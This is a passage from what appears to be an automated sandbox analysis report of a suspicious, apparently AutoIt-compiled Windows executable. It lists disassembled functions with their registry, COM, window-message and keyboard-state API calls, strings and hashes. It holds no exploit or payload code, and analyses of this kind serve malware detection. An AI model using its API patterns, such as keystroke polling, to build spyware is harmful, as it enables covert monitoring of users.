                                                    • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                    • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                    • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                    • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                    • API String ID: 600699880-22481851
                                                    • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                    • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                    • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                    Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: DestroyWindow
                                                    • String ID: static
                                                    • API String ID: 3375834691-2160076837
                                                    • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                    • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                    • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                    Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                    • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                    • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ErrorMode$DriveType
                                                    • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                    • API String ID: 2907320926-3566645568
                                                    • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                    • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                    • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                    Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                    • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                    • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                    • DeleteObject.GDI32(00520000), ref: 00470A04
                                                    • DestroyIcon.USER32(004E004F), ref: 00470A1C
                                                    • DeleteObject.GDI32(D006F933), ref: 00470A34
                                                    • DestroyWindow.USER32(0047004E), ref: 00470A4C
                                                    • DestroyIcon.USER32(?), ref: 00470A73
                                                    • DestroyIcon.USER32(?), ref: 00470A81
                                                    • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                    • String ID:
                                                    • API String ID: 1237572874-0
                                                    • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                    • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                    • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                    Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                    • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                    • VariantInit.OLEAUT32(?), ref: 004793E1
                                                    • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                    • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                    • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                    • VariantClear.OLEAUT32(?), ref: 00479489
                                                    • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                    • VariantClear.OLEAUT32(?), ref: 004794CA
                                                    • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                    • String ID:
                                                    • API String ID: 2706829360-0
                                                    • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                    • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                    • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                    Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?), ref: 0044480E
                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                    • GetKeyState.USER32(000000A0), ref: 004448AA
                                                    • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                    • GetKeyState.USER32(000000A1), ref: 004448D9
                                                    • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                    • GetKeyState.USER32(00000011), ref: 00444903
                                                    • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                    • GetKeyState.USER32(00000012), ref: 0044492D
                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                    • GetKeyState.USER32(0000005B), ref: 00444958
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: State$Async$Keyboard
                                                    • String ID:
                                                    • API String ID: 541375521-0
                                                    • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                    • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                    • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                    Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                    • String ID:
                                                    • API String ID: 3413494760-0
                                                    • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                    • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                    • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                    • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                    Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AddressProc_free_malloc$_strcat_strlen
                                                    • String ID: AU3_FreeVar
                                                    • API String ID: 2634073740-771828931
                                                    • Opcode ID: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                    • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                    • Opcode Fuzzy Hash: b7b62cf44ead268743cea15c23fa0702c80810b5d7796ec40f0430e9877b9643
                                                    • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                    Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CoInitialize.OLE32 ref: 0046C63A
                                                    • CoUninitialize.OLE32 ref: 0046C645
                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                      • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                      • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                    • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                    • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                    • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                    • IIDFromString.OLE32(?,?), ref: 0046C705
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                    • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                    • API String ID: 2294789929-1287834457
                                                    • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                    • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                    • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                    • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                    Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                      • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                      • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                    • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                    • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                    • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                    • ReleaseCapture.USER32 ref: 0047116F
                                                    • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                    • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                    • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                    • API String ID: 2483343779-2107944366
                                                    • Opcode ID: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                    • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                    • Opcode Fuzzy Hash: 0c0f1ff16893fa866466cf5bd33a163e2c592d09522a7afef5934b76f638d362
                                                    • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                    Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                    • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                    • _wcslen.LIBCMT ref: 00450720
                                                    • _wcscat.LIBCMT ref: 00450733
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                    • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat_wcslen
                                                    • String ID: -----$SysListView32
                                                    • API String ID: 4008455318-3975388722
                                                    • Opcode ID: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction ID: d83f74bd31ff7b91e94eebeff09b40632409ca0fd113a8de7250d6f1aa6a1b31
                                                    • Opcode Fuzzy Hash: ffec743b0eb36e838b163f32d05296d45530ca8b23685d337e61e8ea6b23e255
                                                    • Instruction Fuzzy Hash: 9C51D470500308ABDB24CF64CD89FEE77A5EF98304F10065EF944A72C2D3B99959CB58
                                                    Function 00469BF3 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                    • SendMessageW.USER32(00000000,0000018C,000000FF,00000000), ref: 00469C73
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469C84
                                                    • GetParent.USER32 ref: 00469C98
                                                    • SendMessageW.USER32(00000000,?,00000111), ref: 00469C9F
                                                    • GetDlgCtrlID.USER32(00000000), ref: 00469CA5
                                                    • GetParent.USER32 ref: 00469CBC
                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 00469CC3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CtrlParent$_memmove_wcslen
                                                    • String ID: ComboBox$ListBox
                                                    • API String ID: 2360848162-1403004172
                                                    • Opcode ID: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction ID: b77daa4920d68b7dc7b38413de7e2b04daab878370679d8231203fb1b5b646ea
                                                    • Opcode Fuzzy Hash: 7a27601cbaa80f740c595597d901cdf30e8ed390f6d586fa417b55efe09de5c4
                                                    • Instruction Fuzzy Hash: 0121E7716001187BDB00AB69CC85ABF779CEB85320F00855BFA149B2D1D6B8D845C7A5
                                                    Function 0045DC4C Relevance: 15.2, APIs: 10, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1244372181.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1244344666.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244429848.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244454819.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244482699.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244504972.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.1244567621.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_z1newpo.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$FolderUninitialize$BrowseDesktopFromInitializeListMallocPath
                                                    • String ID:
                                                    • API String ID: 262282135-0
                                                    • Opcode ID: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction ID: f209a7e015878e5ef66622a864ec89938c936514b9877fb167e893f071c19078
                                                    • Opcode Fuzzy Hash: 6572a5b0ab20a3b352b20f616e179ebe31bc85c3400954ff5f88a0c3e804af97
                                                    • Instruction Fuzzy Hash: 25718275900208AFCB14EF95C9849DEB7B9EF88304F00899AE9099B312D735EE45CF64
                                                    Function 00448123 Relevance: 15.2, APIs: 10, Instructions: 187windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 004481A8
                                                    • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 004481AB
                                                    • GetWindowLongW.USER32(?,000000F0), ref: 004481CF
                                                    • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004481F2
                                                    • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00448266
                                                    • SendMessageW.USER32(?,00001074,?,00000007), ref: 004482B4
                                                    • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 004482CF
                                                    • SendMessageW.USER32(?,0000101D,00000001,00000000), ref: 004482F1
                                                    • SendMessageW.USER32(?,0000101E,00000001,?), ref: 00448308
                                                    • SendMessageW.USER32(?,00001008,?,00000007), ref: 00448320
                                                    Memory Dump Source
